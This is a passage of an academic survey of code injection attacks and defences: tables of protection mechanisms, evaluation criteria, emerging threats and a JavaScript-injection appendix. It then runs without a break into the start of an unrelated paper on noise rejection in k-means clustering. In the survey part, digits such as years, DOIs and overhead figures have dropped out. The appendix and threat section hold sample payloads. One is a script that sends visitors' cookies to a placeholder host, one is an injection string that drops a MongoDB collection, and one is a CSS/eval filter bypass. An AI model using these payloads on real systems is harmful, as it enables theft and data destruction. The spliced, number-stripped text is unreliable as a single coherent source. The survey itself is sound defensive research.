ms sql smask (johns & beyerlein, ) ? sql, javascript noncespaces (gundy & chen, ) . % javascriptisr xjs (athanasopoulos et al., ) . – ms javascript dsi (nadji, saxena & song, ) . % javascript browsershield (reis et al., ) % javascript blueprint (louw & venkatakrish- nan, ) . % javascript corescript (yu et al., ) ? javascript met (erlingsson, livshits & xie, ) ? javascript beep (jim, swamy & hicks, ) . % javascript csp (stamm, sterne & markham, ) ? javascript google caja ? javascript kiriansky, bruening & amaras- inghe, ( ) ? ∼ % binary code cfi (abadi et al., ; van der veen et al., ) (c) . – . % binary code cpi (kuznetsov et al., ) (c) . – . % binary code policy enforcement ccfi (mashtizadeh et al., ) (c) – % binary code (continued on next page) mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table (continued) approach flexibilitya mechanism requirements attack vector effectiveness testsb implementation independencec computational overheadd amnesia (halfond & orso, b; halfond & orso, ; halfond & orso, a) ? sql didafit (lee, low & wong, ) ? sql (valeur, mutz & vigna ( ) ms sql sqlguard (buehrer, weide & sivilotti, ) % sql diglossia (son, mckinley & shmatikov, ) % sql, nosql sdriver (mitropoulos & spinellis, ; mitropoulos, karakoidas & spinellis, ; mitropoulos et al., ) % sql, xpath nsign (mitropoulos et al., ) . % javascript sicilian (soni, budianto & saxena, ) . % javascript laranjeiro et al. (laranjeiro, vieira & madeira, ; antunes et al., ; laranjeiro, vieira & madeira, ) sql, xpath mattos, santin & malucelli ( ) ? xml, xpath swap (wurzinger et al., ) ∼ % javascript xssds (johns, engelmann & posegga, ) ? javascript whitelisting xss-guard (bisht & venkatakrishnan, ) – % javascript notes. aflexibility indicates if the approach can be adjusted in order to detect different categories. beffectiveness tests. this column shows if the researchers performed any tests regarding the effectiveness of their mechanism in terms of false positive and negative results. cimplementation independence shows if the mechanism depends either on the characteristics of the programming language that was used to develop it or on the implementation details of the protecting entity. dcomputational overhead. this column shows the runtime overhead that the mechanism may add to the application. note that the different results do not necessarily indicate that one mechanism is more effective than the other. this is because most of them were evaluated under different assumptions and settings. performed tests to measure false alarms but they did not look for false negatives. notably, we observed that there are mechanisms that even if they seem effective, their testing might be really poor contrary to other schemes that may have false alarms, but have been tested thoroughly. for example, blueprint appears to be an effective solution to detect javascript injection attacks, but the corresponding publication includes only two test cases. on the other hand, dsi appears to have false positives and negatives, but it was evaluated on a set of , vulnerable web sites. an interesting observation involves the mechanisms that detect javascript injection attacks. unfortunately, most countermeasures, even if the corresponding publications state that they are accurate, are actually vulnerable to attacks that involve non-html elements (except for athanasopoulos et al., ). for instance, there are browsers that mitropoulos and spinellis ( ), peerj comput. sci., doi . 
/peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. treat postscript files as html. a malicious user can embed a script within a postscript file, upload it as a valid document and then use it to trigger the attack (barth, caballero & song, ) (also see the appendix). since most mechanisms require the presence of a document object model dom tree to detect an attack, in this case they will fail. notably, there are cases where the effectiveness of some mechanisms have been questioned. for example, sovarel, evans & paul ( ) have examined the effectiveness of isr and showed that an attacker may be able to circumvent the approach by determining the randomization key. furthermore, their results indicate that doing isr in a way that provides a certain degree of security against a motivated malicious user is not as easy as previously thought. in the same manner, zitser, lippmann & leek ( ) and wilander & kamkar ( ), have extensively tested and questioned some of the aforementioned tools that detect binary code injection attacks. implementation independence in the case of static analysis mechanisms, implementation independence indicates if a mechanism is developed based upon a specific programming language. for instance, all lexical analysis tools except for rats, only analyze applications written in the c programming language. still, rats, which can be used on other languages, does not find code injection vulnerabilities in any other language except for c. in the same manner, sqlj can only be used by java developers. in every case, we list the corresponding language. in the dynamic detection context, implementation independence shows if the mechanism depends either on the characteristics of the programming language that was used to develop it or on the implementation details of the protecting entity. for instance, php aspis can detect various forms of cias that target applications written in php only. in the same manner, cfi mechanisms can only protect programs written in c. computational overhead the user’s experience is affected if a mechanism suffers from runtime overhead. take for example a mechanism from the dynamic detection category. if this mechanism adds significant overhead to the applications functionality, the application’s owner would consider it useless. in the static analysis context, this can be measured in the case of the type system extension approach since their use affects the application overall. in the table we list the overhead for every mechanism as stated in the original publication. if the publication mentions that the mechanism suffers from a runtime overheard but does not explicitly state the occurring overhead we use the x mark ( ). if the authors did not measure the overhead we use a question mark (?). note though that each number is an indication that has been computed under different assumptions and settings and it cannot be used to compare mechanisms directly (especially the ones coming from different categories). however, in cases like nsign and sicilian, this could be meaningful because both are mechanisms that wrap up the javascript engine of a browser. hence, both overheads are imposed on the execution time of the engine. note that the overhead is displayed in different manners (e.g., percentages, absolute numbers and more). in every case this indicates the cost due to the use of each mechanism. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
for example, it may be due to some form of run-time checks. furthermore, depending on the approach, the cost may be incurred on different places: it may affect a server (e.g., cpu usage, response latency and more), it may affect the client, or both. a note on usability the value of a security mechanism as a practical tool depends on how easy it is to deploy it in a production setting. in the static analysis context, a mechanism should require minimum effort from the security auditor. observe that lexical analysis and data-flow analysis mechanisms are easy to use since the only thing that is needed to perform their analysis is the source code. note though that, based on simple assumptions and without considering context in any way lexical analysis could report every possible dangerous function call as a problem, no matter how carefully it is used in the program. hence, auditors must be experienced programmers in order to interpret the results of lexical analysis tools and they must regard them as as an aid in the code review process and not as a firm solution to find software vulnerabilities (cowan, ; zitser, group & leek, ). in addition, model checking and type system extensions require too much effort from the side of the auditor, either to write specifications, modify source code or learn new constructs (see ‘model checking’ and ‘type system extensions’). in the case of dynamic detection, usability involves the deployment of the mechanism. to determine the effort required to use the mechanism, we examined the mechanism’s description, its deployment, and its implementation details. one of our basic criteria was if developers are required to modify their code and if they do, to what extent. as an example, consider the mechanisms coming from the policy enforcement category. in most cases programmers should modify multiple software components to enable a mechanism. note also that mechanisms such as met and beep require modifications both on the server and the client-side. thus, it would not be easy for them to be adopted by browser vendors. in the same manner sqlrand imposes a major infrastructure overhead because it requires the integration of a proxy for the rdbms to detect sql injection attacks. in addition, the whitelisting mechanisms that detect dsl-driven injection attacks, require multiple source code modifications. in particular, to use amnesia, developers should modify every code fragment that involves the execution of a query. nevertheless, there are tools like sdriver, which minimize such modifications down to one line of code. emerging challenges there are several challenges which indicate that code injection attacks will continue to be an issue in the field of cyber security. first, attackers seem to find new ways to introduce malicious code into programs by using a variety of techniques. for instance, an attack called php object injection (poi) (dahse, krein & holz, ) does not directly involve the injection of code, but still achieves arbitrary code execution in the context of a php application through the injection of specially crafted objects (for example as part of cookies). when deserialized by the application, these objects result in arbitrary code execution. in a similar way, xcs (cross-channel scripting) (bojinov, bursztein & boneh, ; bojinov, bursztein & boneh, mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ) attacks are a prominent xss variation. 
in an xcs attack, an attacker utilizes a non-web channel to inject code. for example, there are several nas (network-attached storage) devices which allow unauthorized users to upload files via the smb protocol (server message block). a malicious user could upload a file with a filename that contains a well-crafted script. when a legitimate user connects over a web channel to the device to browse its contents, the device will send through an http response the list of all filenames, ncluding the malicious one which is going to be interpreted as a valid script by the browser. architectures that include modern technologies such as mongodb (http://www. mongodb.org/) could be vulnerable to complex attacks that may involve more than one subcategories as son, mckinley & shmatikov ( ) have pointed out. in particular, a javascript injection attack could be performed to change an sql-like mongodb query that is built dynamically based on user input. specifically, when using javascript, developers have to make sure that any variables that cross the php-to-javascript boundary are passed in the scope field of the mongocode class, (http://www.php.net/manual/en/class.mongocode.php) that is not interpolated into the javascript string. this can come up when using the mongodb::execute() method and clauses like $where and group-by. for example, suppose that javascript is used to greet a user in the database logs: <?php $username = $_post[ ’ username ’ ] ; $db−>e x ec u te ( " p r i n t ( ’ hello , $username ! ’ ) ; " ) ; ?> if attackers pass ’); db.users.drop(); print(’ as a username, they could actually delete the entire database. recent work indicates that code injection can also be used as an attack vector to exploit mobile applications (bao et al., ; jin et al., ). this is not surprising because even though there are slightly different components that interact in the context of mobile applications, programming vulnerabilities thay may lead to code injection can still show up. specifically, as jin et al. ( ) point out, vulnerable html -based mobile applications can be vulnerable to xss variations. such attacks could involve different channels to send malicous scripts to the user’s browser including d barcodes and wi-fi access points. conclusions code injection attacks can be divided into two classes: those that target binary executable code and those that target the source code of domain specific and dynamic languages. approaches that defend against source code injection attacks can be grouped into two major categories: static analysis mechanisms that detect code injection vulnerabilities, and dynamic detection approaches that prevent code injection attacks the moment they take place. tools coming from the static analysis category are mainly used during application development, while dynamic detection mechanisms are employed during production. we examined the defenses based on their flexibility, implementation independence, computational overhead, and effectiveness tests. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.mongodb.org/ http://www.mongodb.org/ http://www.php.net/manual/en/class.mongocode.php http://dx.doi.org/ . /peerj-cs. we observed that researchers do not extensively test their mechanisms in terms of effectiveness. a reasonable explanation for this would be that some defenses do not need to be fully validated through testing, because researchers provide formal arguments as to why they are secure. 
however, this is true only if implementations closely follow the specification, which may not be the case in practical terms. notably, there are cases where the effectiveness of some mechanisms has been questioned (sovarel, evans & paul, ; zitser, lippmann & leek, ; wilander & kamkar, ). moreover, we saw that computational overheads are mostly computed and reported under different assumptions and settings, hence they cannot be used to compare mechanisms directly. overheads also depend on context: in interactive applications latency is important, whereas in a batch setting the important measure is throughput or the corresponding slowdown. by taking account the above it would be fair to compare the sicilian to nsign in terms of computational overhead, because they both wrap up the javascript engine of a browser to defend against xss attacks. nevertheless, it would be spurious to compare both of them to a mechanism that acts as a proxy on the server side to defend against the same threat (e.g., browsershield). we also found that most approaches are flexible, meaning that they can be used to counter different forms of code injection. for example, isr and whitelisting have been applied to counter all kinds of code injection attacks. this is not the case though with lexical analysis, which is used only to detect binary code injection vulnerabilities. approaches can be interdependent and they can borrow heavily from others. consider for instance runtime tainting and data-flow analysis. both examine the flow of data but in different ways: the former does so dynamically and the latter statically. for this reason though, methods can also share the same disadvantages. for example, the state explosion issue appears in both model checking and symbolic execution. currently, most defenses target a small number of attacks, but this will probably change in the future. specifically, a large amount of work has been done to prevent either sql and javascript-driven injection attacks. this makes sense, because these attacks are very common and can have a large impact. less effort has been put to develop approaches that can defend against xpath or xml injection attacks. as a result, there are few corresponding defenses. similarly, there is only one documented mechanism designed to detect php injection attacks, php aspis, and only one that prevents nosql injection attacks, diglossia. attacks and defenses are likely to evolve in the coming years. the driver will be new threats, such as the php object injection (poi) (dahse, krein & holz, ) attack, and cross-channel scripting (xcs), both discussed in ‘emerging challenges’ apart from the above, attackers seem to continuously find new ways to introduce malicious code to applications by using a variety of languages and techniques as we observed earlier (see ‘code injection attacks’ and ‘emerging challenges’. besides, there are several recent attempts to perform code injection on mobile applications (bao et al., ; jin et al., ) which will potentially lead to the development of context-aware defenses. we hope that our categorization, our analysis, and the findings of our research, will aid researchers and mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. practitioners to further study the code injection problem and develop more robust and effective defenses. acknowledgements we want to thank the reviewers for providing us with valuable suggestions and insightful comments. appendix. 
javascript injection attacks a javascript injection vulnerability is manifested when a web application accepts and redisplays data of uncertain origin without appropriate validation and filtering. such content can compromise the security of these applications and the privacy of their corresponding users. many web sites allow registered users to post data which are stored on the server-side (i.e., a third-party comment on a blog page). if attackers hide a script in such data, they could manipulate the browser of another user. for example consider the following code snippet: < s c r i p t type=" t e x t / j a v a s c r i p t "> document . l o c a t i o n = ’ http : / / host . example / cgi− bin / c o o k i e s t e a l i n g . c g i ? ’+ document . cookie </ s c r i p t > if a malicious user could post data containing the above script, web users visiting the page that contains this data could have their cookies stolen. through this script the attacker calls an external common gateway interface (cgi) script and passes all the cookies associated with the current document to it as an argument via the document.cookie property. a common but rough way to stop malicious behaviors like this is server-side code filtering (i.e., the server strips out the word ‘‘javascript’’ from any external source) (jim, swamy & hicks, ). still, there are many ways to bypass such defense mechanisms. for example, one could escape special characters to bypass simple filtering operations, or take advantage of issues in the implementation of cascading style sheets (css) rendering engines of browsers like microsoft internet explorer (versions prior to ). consider the case where an attacker manages to hide the following listing in the css of a web page: <div id=code s t y l e =" background : u r l ( ’ j a v a s c r i p t : e v a l ( document . a l l . code . foo ) ’ ) " foo=" a l e r t ( ’ xss ’ ) "></ div> the attacker utilizes the eval function and a newline character (‘‘java–newline–script’’) to bypass the security checks and manoeuvre browser to execute the code contained in the foo variable. this is done by using the document.all array that contains all of the elements within a document. attacks like the above take advantage of the fact that eval executes the code passed to it in the same environment as the function’s caller. malicious users can also use eval to mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. assemble innocuous-looking parts into harmful strings that the protecting mechanisms of a web page would normally consider dangerous and remove (richards et al., ). furthermore, a javascript injection attack does not necessarily have to involve html elements. a malicious user can embed a script within a postscript file, upload it as a valid document and then use it to trigger the attack (barth, caballero & song, ). additional information and declarations funding this work was funded under action of the athens university of economics and business research center program for excellence and extroversion of the academic year / (ep- - : the ‘‘meta-life’’ of javascript). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: athens university of economics and business research center program: ep- - . competing interests the authors declare there are no competing interests. 
author contributions • dimitris mitropoulos analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • diomidis spinellis wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the research in this article did not generate, collect or analyse any raw data or code. references abadi m, budiu m, erlingsson u, ligatti j. . control-flow integrity. in: jaeger t, ed. proceedings of the th acm conference on computer and communications security, ccs’ . new york: acm, – . abelson h, sussman gj. . structure and interpretation of computer programs. second edition. cambridge: mit press. abi-antoun m, wang d, torr p. . checking threat modeling data flow diagrams for implementation conformance and security. in: stirewalt k, ed. proceedings of the nd ieee/acm international conference on automated software engineering, ase’ . new york: acm, – . aho av, lam ms, sethi r, ullman jd. . compilers: principles, techniques, and tools. second edition. harlow, essex: addison-wesley longman publishing co., inc. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. anderson a. . a comparison of two privacy policy languages: epal and xacml. technical report. sun microsystems, inc., mountain view, ca, usa. anderson p, zarins m. . the codesurfer software understanding platform. in: cordy jr, gall h, maletic ji, eds. proceedings of the th international workshop on program comprehension, iwpc’ . washington, d.c.: ieee computer society, – . anderson rj. . security engineering: a guide to building dependable distributed systems. first edition. new york: john wiley & sons, inc. antunes n, laranjeiro n, vieira m, madeira h. . effective detection of sql/xpath injection vulnerabilities in web services. in: sarkar s, vin hm, zhao jl, eds. proceedings of the ieee international conference on services computing, scc’ . washington, d.c.: ieee computer society, – . athanasopoulos e, pappas v, krithinakis a, ligouras s, markatos ep, karagiannis t. . xjs: practical xss prevention for web application development. in: ousterhout j, ed. proceedings of the usenix conference on web application development, webapps’ . berkeley: usenix association, – . avancini a, ceccato m. . comparison and integration of genetic algorithms and dynamic symbolic execution for security testing of cross-site scripting vulnerabilities. information and software technology ( ): – doi . /j.infsof. . . . avgerinos t, rebert a, cha sk, brumley d. . enhancing symbolic execution with veritesting. in: jalote p, ed. proceedings of the th international conference on software engineering, icse . new york: acm, – . ayewah n, pugh w. . the google findbugs fixit. in: tonella p, ed. proceedings of the th international symposium on software testing and analysis, issta’ . new york: acm, – . baca d, carlsson b, lundberg l. . evaluating the cost reduction of static code analysis for software security. in: erlingsson Ú, pistoia m, eds. proceedings of the third acm sigplan workshop on programming languages and analysis for security, plas’ . new york: acm, – . bao w, yao w, zong m, wang d. . cross-site scripting attacks on android hybrid applications. in: proceedings of the international conference on cryptography, security and privacy, iccsp’ . new york: acm, – . barth a, caballero j, song d. . secure content sniffing for web browsers, or how to stop papers from reviewing themselves. 
in: sterritt r, ed. proceedings of the th ieee symposium on security and privacy. washington, d.c.: ieee computer society, – . bauer l, cai s, jia l, timothy p, michael s, yuan t. . run-time monitoring and formal analysis of information flows in chromium. in: tsudik g, perrig a, eds. network and distributed system security (ndss)’ , – february , san diego, ca, usa. reston: internet society. beyer d, henzinger ta, jhala r, majumdar r. . the software model checker blast: applications to software engineering. international journal on software tools for technology transfer ( ): – doi . /s - - -z. mitropoulos and spinellis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /peerj-cs. bisht p, venkatakrishnan vn. . xss-guard: precise dynamic prevention of cross-site scripting attacks. in: zamboni d, ed. proceedings of the th international conference on detection of intrusions and malware, and vulnerability assessment, dimva’ . berlin: springer-verlag, – . bojinov h, bursztein e, boneh d. . xcs: cross channel scripting and its impact on web applications. in: al-shaer e, ed. proceedings of the th acm conference on computer and communications security. new york: acm, – . bojinov h, bursztein e, boneh d. . the emergence of cross channel scripting. communications of the acm ( ): – doi . / . . boujarwah as, saleh k, al-dallal j. . testing java programs using dynamic data flow analysis. in: carroll j, daminani e, haddad h, oppenheim d, eds. proceedings of the acm symposium on applied computing—volume , sac’ . new york: acm, – . boyd s, keromytis a. . sqlrand: preventing sql injection attacks. in: jakobsson m, yung m, zhou j, eds. proceedings of the nd applied cryptography and network security conference, acns’ . springer-verlag, – . bratus s, locasto me, patterson lsml, shubina a. . exploit programming: from buffer overflows to ‘‘weird machines’’ and theory of computation. j-login ( ): – . brown m, paller a. . secure software development: why the development world awoke to the challenge. information security technical report ( ): – doi . /j.istr. . . . buchanan e, roemer r, shacham h, savage s. . when good instructions go bad: generalizing return-oriented programming to risc. in: ning p, ed. proceedings of the th acm conference on computer and communications security, ccs’ . new york: acm, – . buehrer g, weide bw, sivilotti pag. . using parse tree validation to prevent sql injection attacks. in: di nitto e, murphy al, eds. proceedings of the th international workshop on software engineering and middleware, sem’ . new york: acm, – . cadar c, dunbar d, engler d. . klee: unassisted and automatic generation of high-coverage tests for complex systems programs. in: draves r, van renesse r, eds. proceedings of the th usenix conference on operating systems design and implementation, osdi’ . berkeley: usenix association, – . cadar c, godefroid p, khurshid s, păsăreanu cs, sen k, tillmann n, visser w. . symbolic execution for software testing in practice: preliminary assessment. in: taylor rn, ed. proceedings of the rd international conference on software engineering, icse’ . new york: acm, – . cahoon b, mckinley ks. . data flow analysis for software prefetching linked data structures in java. in: valero m, ed. proceedings of the international conference on parallel architectures and compilation techniques, pact’ . washington, d.c.: ieee computer society, – . mitropoulos and spinellis ( ), peerj comput. sci., doi . 
submitted june, accepted october, published november. corresponding author: seiki ubukata, subukata@cs.osakafu-u.ac.jp. academic editor: sebastian ventura. copyright ubukata, distributed under creative commons cc-by (open access).

a unified approach for cluster-wise and general noise rejection approaches for k-means clustering

seiki ubukata, graduate school of engineering, osaka prefecture university, sakai, osaka, japan

abstract
hard c-means (hcm; k-means) is one of the most widely used partitive clustering techniques. however, hcm is strongly affected by noise objects and cannot represent cluster overlap. to reduce the influence of noise objects, objects distant from cluster centers are rejected in some noise rejection approaches, including general noise rejection (gnr) and cluster-wise noise rejection (cnr). generalized rough c-means (grcm) can deal with positive, negative, and boundary belonging of objects to clusters by reference to rough set theory. grcm realizes cluster overlap by the linear function threshold-based object-cluster assignment. in this study, as a unified approach for gnr and cnr in hcm, we propose linear function threshold-based c-means (liftcm) by relaxing grcm. we show that the linear function threshold-based assignment in liftcm includes gnr, cnr, and their combinations as well as the rough assignment of grcm. the classification boundary is visualized so that the characteristics of liftcm in various parameter settings are clarified. numerical experiments demonstrate that the combinations of rough clustering or the combinations of gnr and cnr realized by liftcm yield satisfactory results.

subjects: data mining and machine learning, data science, optimization theory and computation
keywords: clustering, k-means, noise rejection, rough set theory

introduction
clustering, which is an important task in data mining and machine learning, is a technique for automatically extracting group (cluster) structures from data without supervision. it is useful for analyzing large-scale unlabeled data. hard c-means (hcm; k-means) (macqueen, ) is one of the most widely used partitive clustering techniques. real-world datasets often contain noise objects (outliers) with irregular features that may distort cluster shapes and deteriorate clustering performance. since c-means-type methods are formulated based on the minimization of the total within-cluster sum-of-squared-error, they are strongly affected by noise objects, which are distant from cluster centers. we focus on two types of noise rejection, namely, general noise rejection (gnr) and cluster-wise noise rejection (cnr). in gnr approaches, whether each object is noise or not is defined with respect to the whole cluster structure: objects distant from any cluster center are rejected as noise. in cnr approaches, on the other hand, whether each object is noise or not is defined for each cluster: for each cluster, objects distant from its center are rejected as noise. both
gnr and cnr perform noise rejection, while gnr performs exclusive cluster assignment whereas cnr allows cluster overlap.

hcm assigns each object to one and only one cluster with membership in the boolean (hard; crisp) domain {0, 1}, and thus it cannot represent belonging to multiple clusters or non-belonging to any cluster. however, in real-world datasets, the belonging of objects to clusters is often unclear. soft computing approaches are useful for representing belonging to multiple clusters or non-belonging to any cluster. clustering based on rough set theory (pawlak, ; pawlak, ) considers positive, negative, and boundary belonging of objects to clusters. lingras and west proposed rough c-means (lrcm) (lingras & west, ) as a rough-set-based c-means clustering, and peters proposed a refined version of rcm (prcm) (peters, ). ubukata et al. proposed generalized rcm (grcm) (ubukata, notsu & honda, ) by integrating lrcm and prcm. grcm realizes cluster overlap by a linear function threshold with respect to the distance to the nearest cluster and detects the upper area composed of objects that possibly belong to the cluster. specifically, the threshold based on the distance to the nearest cluster center is lifted by the linear function so that an object can be assigned to relatively near clusters as well as its nearest cluster.

in this study, we investigate the characteristics of the linear function threshold-based object-cluster assignment in grcm. we show that the linear function threshold-based assignment in relaxed grcm can realize gnr, cnr, and their combinations as well as rough assignments. one important point is that the linear function threshold-based assignment essentially includes gnr and cnr in compliance with rcm standards without any extra formulation. as a unified approach for gnr and cnr in hcm, we propose linear function threshold-based c-means (liftcm) by relaxing grcm. the classification boundary is visualized so that the characteristics of liftcm in various parameter settings are clarified. numerical experiments demonstrate that the combinations of rough clustering or the combinations of gnr and cnr realized by liftcm yield satisfactory results.

the remainder of the paper is organized as follows. in "related work," related works are discussed. "preliminaries" presents the preliminaries for clustering methods. in "a unified approach for cluster-wise and general noise rejection approaches," we show that the linear function threshold-based assignment in relaxed grcm can realize gnr, cnr, and their combinations as well as rough assignments. in "proposed method," we propose liftcm as a relaxed variant of grcm. in "visualization of classification boundaries," the classification boundaries of liftcm with various parameter settings are considered. in "numerical experiments," the clustering performance of liftcm with various parameter settings is discussed. in "discussion," the calculation of the cluster center in the proposed method is discussed. finally, the conclusions are presented in "conclusions."

related work

noise rejection in regression analysis and c-means-type clustering
many machine learning tasks, such as regression analysis, are formulated in the framework of least mean squares (lms) proposed by legendre or gauss (legendre, ; gauss, ),
finally, the conclusions are presented in ‘‘conclusions.’’ related work noise rejection in regression analysis and c-means-type clustering many machine learning tasks such as regression analysis are formulated in a framework of least mean squares (lms) proposed by legendre or gauss (legendre, ; gauss, ), ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. which minimizes the sum of the squared residuals to fit models to a dataset. however, since the lms criterion is strongly affected by noise objects and has the lack of robustness, various robust estimation methods have been proposed to reduce the influence of noise objects. least absolute values (lav) (edgeworth, ) is a criterion that minimizes the sum of the absolute values of the residuals to reduce the influence of large residuals. m-estimator (huber, ; huber, ) is one of the most widely used robust estimators, which replaces the square function in lms by a symmetric function with a unique minimum at zero that reduces the influence of large residuals. least median of squares (lmeds) (hampel, ; rousseeuw, ) minimizes the median of the squared residuals. least trimmed squares (lts) (rousseeuw & leroy, ) minimizes the sum of the squared residuals up to h-th objects in ascending list of residuals. since c-means-type clustering methods are generally formulated based on the minimization of the within-cluster sum-of-squared-error, the above-mentioned robust estimation methods are promising approaches to noise in the cluster structure (kaufmann & rousseeuw, ; dubes & jain, ). in c-means-type clustering, the distance between object and its nearest cluster center is identified as the residual. thus, in gnr, objects distant from any cluster center are rejected as noise. for instance, trimmed c-means (tcm; trimmed k-means, tkm) (cuesta-albertos, gordaliza & matrán, ; garcia- escudero & gordaliza, ) introduces lts criterion to hcm. tcm calculates the new cluster center by using objects up to h-th in ascending list of the distances to their nearest cluster centers. as a result, objects more than a certain distance away are rejected as noise. noise rejection in c-means-type clustering is also well discussed in the context of fuzzy c-means (fcm) (dunn, ; bezdek, ). in noise fuzzy c-means (nfcm) (davé, ; davé & krishnapuram, ), a single noise cluster is introduced in addition to the intended regular clusters and objects distant from any cluster center are absorbed in the noise cluster. another approach to noise is cnr. for instance, possibilistic c-means (pcm) (krishnapuram & keller, ; krishnapuram & keller, ) considers cluster-wise noise rejection, in which each cluster is extracted independently while rejecting objects distant from its center. the membership values are interpreted as degrees of possibility of the object belonging to clusters. pcm represents typicality as absolute membership to clusters rather than relative membership by eliminating the sum-to-one constraint. fuzzy possibilistic c-means (fpcm) (pal, pal & bezdek, ) uses both relative typicalities (memberships) and absolute typicalities. possibilistic fuzzy c-means (pfcm) (pal et al., ) is a hybridization of fcm and pcm using both probabilistic memberships of fcm and possibilistic memberships of pcm. in this study, we show that gnr, cnr, and their combinations are realized by the linear function threshold-based object-cluster assignment in the proposed liftcm. 
the above-mentioned approaches introduce various mechanisms to realize gnr and cnr. in contrast, the linear function threshold-based assignment essentially includes gnr, cnr, and their combinations in compliance with rcm standards, without any extra formulation.

generalized approaches to hard, fuzzy, noise, possibilistic, and rough clustering
maji & pal ( a) proposed rough-fuzzy c-means (rfcm) as a hybrid algorithm of fcm and rcm. rfcm is formulated so that objects in the lower areas have crisp memberships and objects in the boundary areas have fcm-based fuzzy memberships. furthermore, maji & pal ( b) proposed rough-fuzzy possibilistic c-means (rfpcm) based on possibilistic fuzzy c-means (pfcm) (pal et al., ). masson and denœux proposed evidential c-means (ecm) (masson & denoeux, ) as one of the evidential clustering (evclus) (denoeux & masson, ; denoeux & masson, ) methods based on the dempster-shafer theory of belief functions (evidence theory). evidential clustering considers the basic belief assignment, which indicates the membership (mass of belief) of each object to each subset of clusters under probabilistic constraints, and thereby derives a credal partition. a credal partition can represent hard and fuzzy partitions with a noise cluster by considering assignments to singletons and to the empty set. possibilistic and rough partitions are represented by using the plausibility function and the belief function (denoeux & kanjanatarakul, ). although rfcm and rfpcm provide interesting perspectives on the handling of uncertainty in the boundary area, their object-cluster assignment differs from that of rcm, which turns them into a different type of approach. although the credal partition in ecm is highly expressive and covers hard, noise, possibilistic, and rough clustering, the object-cluster assignment and cluster center calculation of ecm do not boil down to those of rcm. in contrast to the above-mentioned approaches, the formulation of the proposed liftcm is fully compliant with rcm standards. this study reveals that rcm itself inherently includes gnr, cnr, and their combinations, as well as rough clustering aspects, without any extra formulation.

preliminaries

hard c-means and noise rejection
let $U = \{x_1, \ldots, x_i, \ldots, x_n\}$ be a set of $n$ objects, where each object $x_i = (x_{i1}, \ldots, x_{ij}, \ldots, x_{ip})^\top$ is a $p$-dimensional real feature vector. in c-means-type methods, $C$ ($C < n$) denotes the number of clusters, and $C$ clusters composed of similar objects are extracted from $U$. each cluster has a prototypical point (cluster center), which is a $p$-dimensional vector $b_c = (b_{c1}, \ldots, b_{cj}, \ldots, b_{cp})^\top$. let $u_{ci}$ be the degree of belonging of object $i$ to cluster $c$, and let $d_{ci} = \|x_i - b_c\|$ be the distance between the cluster center $b_c$ and object $i$. the optimization problem of hcm (macqueen, ) is given by
$$\min.\ J_{\mathrm{HCM}} = \sum_{c=1}^{C}\sum_{i=1}^{n} u_{ci}\, d_{ci}^{2},$$
$$\text{s.t.}\quad u_{ci} \in \{0, 1\},\ \forall c, i, \qquad \sum_{c=1}^{C} u_{ci} = 1,\ \forall i.$$
hcm minimizes the total within-cluster sum-of-squared-error under the boolean domain constraint and the sum-to-one constraint across clusters. hcm first initializes the cluster centers and then alternately updates $u_{ci}$ and $b_c$ until convergence by using the following update rules:
$$u_{ci} = \begin{cases} 1 & \left(c = \arg\min_{1 \le l \le C} d_{li}\right), \\ 0 & (\text{otherwise}), \end{cases} \qquad b_c = \frac{\sum_{i=1}^{n} u_{ci}\, x_i}{\sum_{i=1}^{n} u_{ci}}.$$
there are various strategies for initializing cluster centers.
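as a concrete illustration of the alternating updates above, a minimal hcm sketch is given below. it is illustrative code, not the author's implementation; it uses the naive random-sampling initialization described next, and the names `hcm`, `n_iter`, and `seed` are assumptions of the example.

```python
import numpy as np

def hcm(X, C, n_iter=100, seed=0):
    """Minimal hard c-means: nearest-center assignment and mean update."""
    rng = np.random.default_rng(seed)
    n = len(X)
    # naive initialization: choose C objects as initial centers at random
    centers = X[rng.choice(n, size=C, replace=False)].astype(float)
    for _ in range(n_iter):
        # d[i, c] is the distance d_ci between object i and center c
        d = np.linalg.norm(X[:, None, :] - centers[None, :, :], axis=2)
        u = np.zeros((n, C))
        u[np.arange(n), d.argmin(axis=1)] = 1.0   # assign to the nearest center
        new_centers = np.array([
            X[u[:, c] == 1].mean(axis=0) if u[:, c].any() else centers[c]
            for c in range(C)
        ])
        if np.allclose(new_centers, centers):
            break
        centers = new_centers
    return u, centers
```

the boolean assignment matrix realizes the nearest-center membership rule, and the per-cluster mean realizes the center update rule.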
